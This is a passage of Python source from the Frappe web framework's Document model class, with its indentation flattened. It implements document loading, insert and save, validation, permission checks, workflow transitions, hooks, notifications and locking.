# first argument is a dict
kwargs = args[0]
if kwargs:
# init base document
super(Document, self).__init__(kwargs)
self.init_valid_columns()
else:
# incorrect arguments. let's not proceed.
raise ValueError('Illegal arguments')
@staticmethod
def whitelist(f):
"""Decorator: Whitelist method to be called remotely via REST API."""
f.whitelisted = True
return f
def reload(self):
"""Reload document from database"""
self.load_from_db()
def load_from_db(self):
"""Load document and children from database and create properties
from fields"""
if not getattr(self, "_metaclass", False) and self.meta.issingle:
single_doc = frappe.db.get_singles_dict(self.doctype)
if not single_doc:
single_doc = frappe.new_doc(self.doctype).as_dict()
single_doc["name"] = self.doctype
del single_doc["__islocal"]
super(Document, self).__init__(single_doc)
self.init_valid_columns()
self._fix_numeric_types()
else:
d = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not d:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(Document, self).__init__(d)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
table_fields = DOCTYPE_TABLE_FIELDS
else:
table_fields = self.meta.get_table_fields()
for df in table_fields:
children = frappe.db.get_values(df.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": df.fieldname},
"*", as_dict=True, order_by="idx asc")
if children:
self.set(df.fieldname, children)
else:
self.set(df.fieldname, [])
# sometimes __setup__ can depend on child values, hence calling again at the end
if hasattr(self, "__setup__"):
self.__setup__()
def get_latest(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def check_permission(self, permtype='read', permlevel=None):
"""Raise `frappe.PermissionError` if not permitted"""
if not self.has_permission(permtype):
self.raise_no_permission_to(permlevel or permtype)
def has_permission(self, permtype="read", verbose=False):
"""Call `frappe.has_permission` if `self.flags.ignore_permissions`
is not set.
:param permtype: one of `read`, `write`, `submit`, `cancel`, `delete`"""
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, permtype, self, verbose=verbose)
def raise_no_permission_to(self, perm_type):
"""Raise `frappe.PermissionError`."""
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def insert(self, ignore_permissions=None, ignore_links=None, ignore_if_duplicate=False,
ignore_mandatory=None, set_name=None, set_child_names=True):
"""Insert the document in the database (as a new document).
This will check for user permissions and execute `before_insert`,
`validate`, `on_update`, `after_insert` methods if they are written.
:param ignore_permissions: Do not check permissions if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
if ignore_links!=None:
self.flags.ignore_links = ignore_links
if ignore_mandatory!=None:
self.flags.ignore_mandatory = ignore_mandatory
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(set_name=set_name, set_child_names=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
# run validate, on update etc.
# parent
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not ignore_if_duplicate:
raise e
# children
for d in self.get_all_children():
d.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
# flag to prevent creation of event update log for create and update both
# during document creation
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
# delete __islocal
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def save(self, *args, **kwargs):
"""Wrapper for _save"""
return self._save(*args, **kwargs)
def _save(self, ignore_permissions=None, ignore_version=None):
"""Save the current document in the database in the **DocType**'s table or
`tabSingles` (for single types).
This will check for user permissions and execute
`validate` before updating, `on_update` after updating triggers.
:param ignore_permissions: Do not check permissions if True.
:param ignore_version: Do not save version if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
self.flags.ignore_version = frappe.flags.in_test if ignore_version is None else ignore_version
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
# parent
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def copy_attachments_from_amended_from(self):
"""Copy attachments from `amended_from`"""
from frappe.desk.form.load import get_attachments
#loop through attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
#save attachments to new doc
_file = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
_file.save()
def update_children(self):
"""update child tables"""
for df in self.meta.get_table_fields():
self.update_child_table(df.fieldname, df)
def update_child_table(self, fieldname, df=None):
"""sync child table for given fieldname"""
rows = []
if not df:
df = self.meta.get_field(fieldname)
for d in self.get(df.fieldname):
d.db_update()
rows.append(d.name)
if df.options in (self.flags.ignore_children_type or []):
# do not delete rows for this because of flags
# hack for docperm :(
return
if rows:
# select rows that do not match the ones in the document
deleted_rows = frappe.db.sql("""select name from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s
and name not in ({1})""".format(df.options, ','.join(['%s'] * len(rows))),
[self.name, self.doctype, fieldname] + rows)
if len(deleted_rows) > 0:
# delete rows that do not match the ones in the document
frappe.db.sql("""delete from `tab{0}` where name in ({1})""".format(df.options,
','.join(['%s'] * len(deleted_rows))), tuple(row[0] for row in deleted_rows))
else:
# no rows found, delete all rows
frappe.db.sql("""delete from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s""".format(df.options),
(self.name, self.doctype, fieldname))
def get_doc_before_save(self):
return getattr(self, '_doc_before_save', None)
def has_value_changed(self, fieldname):
'''Returns true if value is changed before and after saving'''
previous = self.get_doc_before_save()
return previous.get(fieldname)!=self.get(fieldname) if previous else True
def set_new_name(self, force=False, set_name=None, set_child_names=True):
"""Calls `frappe.naming.set_new_name` for parent and child docs."""
if self.flags.name_set and not force:
return
# If autoname has set as Prompt (name)
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if set_name:
self.name = set_name
else:
set_new_name(self)
if set_child_names:
# set name for children
for d in self.get_all_children():
set_new_name(d)
self.flags.name_set = True
def get_title(self):
"""Get the document title based on title_field or `title` or `name`"""
return self.get(self.meta.get_title_field())
def set_title_field(self):
"""Set title field based on template"""
def get_values():
values = self.as_dict()
# format values
for key, value in iteritems(values):
if value==None:
values[key] = ""
return values
if self.meta.get("title_field")=="title":
df = self.meta.get_field(self.meta.title_field)
if df.options:
self.set(df.fieldname, df.options.format(**get_values()))
elif self.is_new() and not self.get(df.fieldname) and df.default:
# set default title for new transactions (if default)
self.set(df.fieldname, df.default.format(**get_values()))
def update_single(self, d):
"""Updates values for Single type Document in `tabSingles`."""
frappe.db.sql("""delete from `tabSingles` where doctype=%s""", self.doctype)
for field, value in iteritems(d):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (doctype, field, value)
values (%s, %s, %s)""", (self.doctype, field, value))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def set_user_and_timestamp(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for d in self.get_all_children():
d.modified = self.modified
d.modified_by = self.modified_by
if not d.owner:
d.owner = self.owner
if not d.creation:
d.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def set_docstatus(self):
if self.docstatus==None:
self.docstatus=0
for d in self.get_all_children():
d.docstatus = self.docstatus
def _validate(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
children = self.get_all_children()
for d in children:
d._validate_data_fields()
d._validate_selects()
d._validate_non_negative()
d._validate_length()
d._extract_images_from_text_editor()
d._sanitize_content()
d._save_passwords()
if self.is_new():
# don't set fields like _assign, _comments for new doc
for fieldname in optional_fields:
self.set(fieldname, None)
else:
self.validate_set_only_once()
def _validate_non_negative(self):
def get_msg(df):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(df.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(df.parent), frappe.bold(_(df.label)))
for df in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(df.fieldname)) < 0:
msg = get_msg(df)
frappe.throw(msg, frappe.NonNegativeError, title=_("Negative Value"))
def validate_workflow(self):
"""Validate if the workflow transition is valid"""
if frappe.flags.in_install == 'frappe': return
workflow = self.meta.get_workflow()
if workflow:
validate_workflow(self)
if not self._action == 'save':
set_workflow_state_on_action(self, workflow, self._action)
def validate_set_only_once(self):
"""Validate that fields are not changed if not in insert"""
set_only_once_fields = self.meta.get_set_only_once_fields()
if set_only_once_fields and self._doc_before_save:
# document exists before saving
for field in set_only_once_fields:
fail = False
value = self.get(field.fieldname)
original_value = self._doc_before_save.get(field.fieldname)
if field.fieldtype in table_fields:
fail = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
fail = str(value) != str(original_value)
else:
fail = value != original_value
if fail:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def is_child_table_same(self, fieldname):
"""Validate child table is same as original table before saving"""
value = self.get(fieldname)
original_value = self._doc_before_save.get(fieldname)
same = True
if len(original_value) != len(value):
same = False
else:
# check all child entries
for i, d in enumerate(original_value):
new_child = value[i].as_dict(convert_dates_to_str = True)
original_child = d.as_dict(convert_dates_to_str = True)
# all fields must be same other than modified and modified_by
for key in ('modified', 'modified_by', 'creation'):
del new_child[key]
del original_child[key]
if original_child != new_child:
same = False
break
return same
def apply_fieldlevel_read_permissions(self):
"""Remove values the user is not allowed to read (called when loading in desk)"""
if frappe.session.user == "Administrator":
return
has_higher_permlevel = False
all_fields = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
all_fields += frappe.get_meta(table_field.options).fields or []
for df in all_fields:
if df.permlevel > 0:
has_higher_permlevel = True
break
if not has_higher_permlevel:
return
has_access_to = self.get_permlevel_access('read')
for df in self.meta.fields:
if df.permlevel and not df.permlevel in has_access_to:
self.set(df.fieldname, None)
for table_field in self.meta.get_table_fields():
for df in frappe.get_meta(table_field.options).fields or []:
if df.permlevel and not df.permlevel in has_access_to:
for child in self.get(table_field.fieldname) or []:
child.set(df.fieldname, None)
def validate_higher_perm_levels(self):
"""If the user does not have permissions at permlevel > 0, then reset the values to original / default"""
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
has_access_to = self.get_permlevel_access()
high_permlevel_fields = self.meta.get_high_permlevel_fields()
if high_permlevel_fields:
self.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
# If new record then don't reset the values for child table
if self.is_new(): return
# check for child tables
for df in self.meta.get_table_fields():
high_permlevel_fields = frappe.get_meta(df.options).get_high_permlevel_fields()
if high_permlevel_fields:
for d in self.get(df.fieldname):
d.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
def get_permlevel_access(self, permission_type='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[permission_type] = []
roles = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in roles and perm.get(permission_type):
if perm.permlevel not in self._has_access_to[permission_type]:
self._has_access_to[permission_type].append(perm.permlevel)
return self._has_access_to[permission_type]
def has_permlevel_access_to(self, fieldname, df=None, permission_type='read'):
if not df:
df = self.meta.get_field(fieldname)
return df.permlevel in self.get_permlevel_access(permission_type)
def get_permissions(self):
if self.meta.istable:
# use parent permissions
permissions = frappe.get_meta(self.parenttype).permissions
else:
permissions = self.meta.permissions
return permissions
def _set_defaults(self):
if frappe.flags.in_import:
return
new_doc = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(new_doc)
# children
for df in self.meta.get_table_fields():
new_doc = frappe.new_doc(df.options, as_dict=True)
value = self.get(df.fieldname)
if isinstance(value, list):
for d in value:
d.update_if_missing(new_doc)
def check_if_latest(self):
"""Checks if `modified` timestamp provided by document being updated is same as the
`modified` timestamp in the database. If there is a different, the document has been
updated in the database after the current copy was read. Will throw an error if
timestamps don't match.
Will also validate document transitions (Save > Submit > Cancel) calling
`self.check_docstatus_transition`."""
conflict = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
modified = frappe.db.sql("""select value from tabSingles
where doctype=%s and field='modified' for update""", self.doctype)
modified = modified and modified[0][0]
if modified and modified != cstr(self._original_modified):
conflict = True
else:
tmp = frappe.db.sql("""select modified, docstatus from `tab{0}`
where name = %s for update""".format(self.doctype), self.name, as_dict=True)
if not tmp:
frappe.throw(_("Record does not exist"))
else:
tmp = tmp[0]
modified = cstr(tmp.modified)
if modified and modified != cstr(self._original_modified):
conflict = True
self.check_docstatus_transition(tmp.docstatus)
if conflict:
frappe.msgprint(_("Error: Document has been modified after you have opened it") \
+ (" (%s, %s). " % (modified, self.modified)) \
+ _("Please refresh to get the latest document."),
raise_exception=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def check_docstatus_transition(self, docstatus):
"""Ensures valid `docstatus` transition.
Valid transitions are (number in brackets is `docstatus`):
- Save (0) > Save (0)
- Save (0) > Submit (1)
- Submit (1) > Submit (1)
- Submit (1) > Cancel (2)
"""
if not self.docstatus:
self.docstatus = 0
if docstatus==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 0 to 2"))
elif docstatus==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 1 to 0"))
elif docstatus==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def set_parent_in_children(self):
"""Updates `parent` and `parenttype` property in all children."""
for d in self.get_all_children():
d.parent = self.name
d.parenttype = self.doctype
def set_name_in_children(self):
# Set name for any new children
for d in self.get_all_children():
if not d.name:
set_new_name(d)
def validate_update_after_submit(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for d in self.get_all_children():
if d.is_new() and self.meta.get_field(d.parentfield).allow_on_submit:
# in case of a new row, don't validate allow on submit, if table is allow on submit
continue
d._validate_update_after_submit()
# TODO check only allowed values are updated
def _validate_mandatory(self):
if self.flags.ignore_mandatory:
return
missing = self._get_missing_mandatory_fields()
for d in self.get_all_children():
missing.extend(d._get_missing_mandatory_fields())
if not missing:
return
for fieldname, msg in missing:
msgprint(msg)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{doctype}, {name}]: {fields}'.format(
fields=", ".join((each[0] for each in missing)),
doctype=self.doctype,
name=self.name))
def _validate_links(self):
if self.flags.ignore_links or self._action == "cancel":
return
invalid_links, cancelled_links = self.get_invalid_links()
for d in self.get_all_children():
result = d.get_invalid_links(is_submittable=self.meta.is_submittable)
invalid_links.extend(result[0])
cancelled_links.extend(result[1])
if invalid_links:
msg = ", ".join((each[2] for each in invalid_links))
frappe.throw(_("Could not find {0}").format(msg),
frappe.LinkValidationError)
if cancelled_links:
msg = ", ".join((each[2] for each in cancelled_links))
frappe.throw(_("Cannot link cancelled document: {0}").format(msg),
frappe.CancelledLinkError)
def get_all_children(self, parenttype=None):
"""Returns all children documents from **Table** type field in a list."""
ret = []
for df in self.meta.get("fields", {"fieldtype": ['in', table_fields]}):
if parenttype:
if df.options==parenttype:
return self.get(df.fieldname)
value = self.get(df.fieldname)
if isinstance(value, list):
ret.extend(value)
return ret
def run_method(self, method, *args, **kwargs):
"""run standard triggers, plus those in hooks"""
if "flags" in kwargs:
del kwargs["flags"]
if hasattr(self, method) and hasattr(getattr(self, method), "__call__"):
fn = lambda self, *args, **kwargs: getattr(self, method)(*args, **kwargs)
else:
# hack! to run hooks even if method does not exist
fn = lambda self, *args, **kwargs: None
fn.__name__ = str(method)
out = Document.hook(fn)(self, *args, **kwargs)
self.run_notifications(method)
run_webhooks(self, method)
run_server_script_for_doc_event(self, method)
return out
def run_trigger(self, method, *args, **kwargs):
return self.run_method(method, *args, **kwargs)
def run_notifications(self, method):
"""Run notifications for this method"""
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
alerts = frappe.cache().hget('notifications', self.doctype)
if alerts==None:
alerts = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, alerts)
self.flags.notifications = alerts
if not self.flags.notifications:
return
def _evaluate_alert(alert):
if not alert.name in self.flags.notifications_executed:
evaluate_alert(self, alert.name, alert.event)
self.flags.notifications_executed.append(alert.name)
event_map = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
# value change is not applicable in insert
event_map['on_change'] = 'Value Change'
for alert in self.flags.notifications:
event = event_map.get(method, None)
if event and alert.event == event:
_evaluate_alert(alert)
elif alert.event=='Method' and method == alert.method:
_evaluate_alert(alert)
@whitelist.__func__
def _submit(self):
"""Submit the document. Sets `docstatus` = 1, then saves."""
self.docstatus = 1
self.save()
@whitelist.__func__
def _cancel(self):
"""Cancel the document. Sets `docstatus` = 2, then saves."""
self.docstatus = 2
self.save()
@whitelist.__func__
def submit(self):
"""Submit the document. Sets `docstatus` = 1, then saves."""
self._submit()
@whitelist.__func__
def cancel(self):
"""Cancel the document. Sets `docstatus` = 2, then saves."""
self._cancel()
def delete(self, ignore_permissions=False):
"""Delete document."""
frappe.delete_doc(self.doctype, self.name, ignore_permissions = ignore_permissions, flags=self.flags)
def run_before_save_methods(self):
"""Run standard methods before `INSERT` or `UPDATE`. Standard Methods are:
- `validate`, `before_save` for **Save**.
- `validate`, `before_submit` for **Submit**.
- `before_cancel` for **Cancel**
- `before_update_after_submit` for **Update after Submit**
Will also update title_field if set"""
self.load_doc_before_save()
self.reset_seen()
# before_validate method should be executed before ignoring validations
if self._action in ("save", "submit"):
self.run_method("before_validate")
if self.flags.ignore_validate:
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
self.set_title_field()
def load_doc_before_save(self):
"""Save load document from db before saving"""
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
def run_post_save_methods(self):
"""Run standard methods after `INSERT` or `UPDATE`. Standard Methods are:
- `on_update` for **Save**.
- `on_update`, `on_submit` for **Submit**.
- `on_cancel` for **Cancel**
- `update_after_submit` for **Update after Submit**"""
doc_before_save = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
def clear_cache(self):
frappe.clear_document_cache(self.doctype, self.name)
def reset_seen(self):
"""Clear _seen property and set current user as seen"""
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), update_modified=False)
def notify_update(self):
"""Publish realtime that the current document is modified"""
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
doctype=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
data = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", data, after_commit=True)
def db_set(self, fieldname, value=None, update_modified=True, notify=False, commit=False):
"""Set a value in the document object, update the timestamp and update the database.
WARNING: This method does not trigger controller validations and should
be used very carefully.
:param fieldname: fieldname of the property to be updated, or a {"field":"value"} dictionary
:param value: value of the property to be updated
:param update_modified: default True. updates the `modified` and `modified_by` properties
:param notify: default False. run doc.notify_updated() to send updates via socketio
:param commit: default False. run frappe.db.commit()
"""
if isinstance(fieldname, dict):
self.update(fieldname)
else:
self.set(fieldname, value)
if update_modified and (self.doctype, self.name) not in frappe.flags.currently_saving:
# don't update modified timestamp if called from post save methods
# like on_update or on_submit
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
# to trigger notification on value change
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, fieldname, value,
self.modified, self.modified_by, update_modified=update_modified)
self.run_method('on_change')
if notify:
self.notify_update()
self.clear_cache()
if commit:
frappe.db.commit()
def db_get(self, fieldname):
"""get database value for this fieldname"""
return frappe.db.get_value(self.doctype, self.name, fieldname)
def check_no_back_links_exist(self):
"""Check if document links to any active document before Cancel."""
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, method="Cancel")
check_if_doc_is_dynamically_linked(self, method="Cancel")
def save_version(self):
"""Save version info"""
# don't track version under following conditions
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
version = frappe.new_doc('Version')
if not self._doc_before_save:
version.for_insert(self)
version.insert(ignore_permissions=True)
elif version.set_diff(self._doc_before_save, self):
version.insert(ignore_permissions=True)
if not frappe.flags.in_migrate:
# follow since you made a change?
follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def hook(f):
"""Decorator: Make method `hookable` (i.e. extensible by another app).
Note: If each hooked method returns a value (dict), then all returns are
collated in one dict and returned. Ideally, don't return values in hookable
methods, set properties in the document."""
def add_to_return_value(self, new_return_value):
if isinstance(new_return_value, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(new_return_value)
else:
self._return_value = new_return_value or self.get("_return_value")
def compose(fn, *hooks):
def runner(self, method, *args, **kwargs):
add_to_return_value(self, fn(self, *args, **kwargs))
for f in hooks:
add_to_return_value(self, f(self, method, *args, **kwargs))
return self._return_value
return runner
def composer(self, *args, **kwargs):
hooks = []
method = f.__name__
doc_events = frappe.get_doc_hooks()
for handler in doc_events.get(self.doctype, {}).get(method, []) \
+ doc_events.get("*", {}).get(method, []):
hooks.append(frappe.get_attr(handler))
composed = compose(f, *hooks)
return composed(self, method, *args, **kwargs)
return composer
def is_whitelisted(self, method):
fn = getattr(self, method, None)
if not fn:
raise NotFound("Method {0} not found".format(method))
elif not getattr(fn, "whitelisted", False):
raise Forbidden("Method {0} not whitelisted".format(method))
def validate_value(self, fieldname, condition, val2, doc=None, raise_exception=None):
"""Check that value of fieldname should be 'condition' val2
else throw Exception."""
error_condition_map = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not doc:
doc = self
val1 = doc.get_value(fieldname)
df = doc.meta.get_field(fieldname)
val2 = doc.cast(val2, df)
if not frappe.compare(val1, condition, val2):
label = doc.meta.get_label(fieldname)
condition_str = error_condition_map.get(condition, condition)
if doc.parentfield:
msg = _("Incorrect value in row {0}: {1} must be {2} {3}").format(doc.idx, label, condition_str, val2)
else:
msg = _("Incorrect value: {0} must be {1} {2}").format(label, condition_str, val2)
# raise passed exception or True
msgprint(msg, raise_exception=raise_exception or True)
def validate_table_has_rows(self, parentfield, raise_exception=None):
"""Raise exception if Table field is empty."""
if not (isinstance(self.get(parentfield), list) and len(self.get(parentfield)) > 0):
label = self.meta.get_label(parentfield)
frappe.throw(_("Table {0} cannot be empty").format(label), raise_exception or frappe.EmptyTableError)
def round_floats_in(self, doc, fieldnames=None):
"""Round floats for all `Currency`, `Float`, `Percent` fields for the given doc.
:param doc: Document whose numeric properties are to be rounded.
:param fieldnames: [Optional] List of fields to be rounded."""
if not fieldnames:
fieldnames = (df.fieldname for df in
doc.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for fieldname in fieldnames:
doc.set(fieldname, flt(doc.get(fieldname), self.precision(fieldname, doc.parentfield)))
def get_url(self):
"""Returns Desk URL for this document. `/app/Form/{doctype}/{name}`"""
return "/app/Form/{doctype}/{name}".format(doctype=self.doctype, name=self.name)
def add_comment(self, comment_type='Comment', text=None, comment_email=None, link_doctype=None, link_name=None, comment_by=None):
"""Add a comment to this document.
:param comment_type: e.g. `Comment`. See Communication for more info."""
out = frappe.get_doc({
"doctype":"Comment",
'comment_type': comment_type,
"comment_email": comment_email or frappe.session.user,
"comment_by": comment_by,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": text or comment_type,
"link_doctype": link_doctype,
"link_name": link_name
}).insert(ignore_permissions=True)
return out
def add_seen(self, user=None):
"""add the given/current user to list of users who have seen this document (_seen)"""
if not user:
user = frappe.session.user
if self.meta.track_seen:
_seen = self.get('_seen') or []
_seen = frappe.parse_json(_seen)
if user not in _seen:
_seen.append(user)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(_seen), update_modified=False)
frappe.local.flags.commit = True
def add_viewed(self, user=None):
"""add log to communication when a user views a document"""
if not user:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(ignore_permissions=True)
frappe.local.flags.commit = True
def get_signature(self):
"""Returns signature (hash) for private URL."""
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def get_liked_by(self):
liked_by = getattr(self, "_liked_by", None)
if liked_by:
return json.loads(liked_by)
else:
return []
def set_onload(self, key, value):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[key] = value
def get_onload(self, key=None):
if not key:
return self.get("__onload", frappe._dict())
return self.get('__onload')[key]
def queue_action(self, action, **kwargs):
"""Run an action in background. If the action has an inner function,
like _submit for submit, it will call that instead"""
# call _submit instead of submit, so you can override submit to call
# run_delayed based on some action
# See: Stock Reconciliation
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + action):
action = '_' + action
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', doctype=self.doctype, name=self.name,
action=action, **kwargs)
def lock(self, timeout=None):
"""Creates a lock file for the given document. If timeout is set,
it will retry every 1 second for acquiring the lock again
:param timeout: Timeout in seconds, default 0"""
signature = self.get_signature()
if file_lock.lock_exists(signature):
lock_exists = True
if timeout:
for i in range(timeout):
time.sleep(1)
if not file_lock.lock_exists(signature):
lock_exists = False
break
if lock_exists:
raise frappe.DocumentLockedError
file_lock.create_lock(signature)
def unlock(self):
"""Delete the lock file for this document"""
file_lock.delete_lock(self.get_signature())
# validation helpers
def validate_from_to_dates(self, from_date_field, to_date_field):
"""
Generic validation to verify date sequence
"""
if date_diff(self.get(to_date_field), self.get(from_date_field)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(to_date_field)),
frappe.bold(self.meta.get_label(from_date_field)),
), frappe.exceptions.InvalidDates)
def get_assigned_users(self):
assignments = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
users = set([assignment.owner for assignment in assignments])
return users
def add_tag(self, tag):
"""Add a Tag to this document"""
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, tag)
def get_tags(self):
"""Return a list of Tags attached to this document"""
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def execute_action(doctype, name, action, **kwargs):
"""Execute an action on a document (called by background worker)"""
doc = frappe.get_doc(doctype, name)
doc.unlock()
try:
getattr(doc, action)(**kwargs)
except Exception:
frappe.db.rollback()
# add a comment (?)
if frappe.local.message_log:
msg = json.loads(frappe.local.message_log[-1]).get('message')
else:
msg = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
doc.add_comment('Comment', _('Action Failed') + '<br><br>' + msg)
doc.notify_update()
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
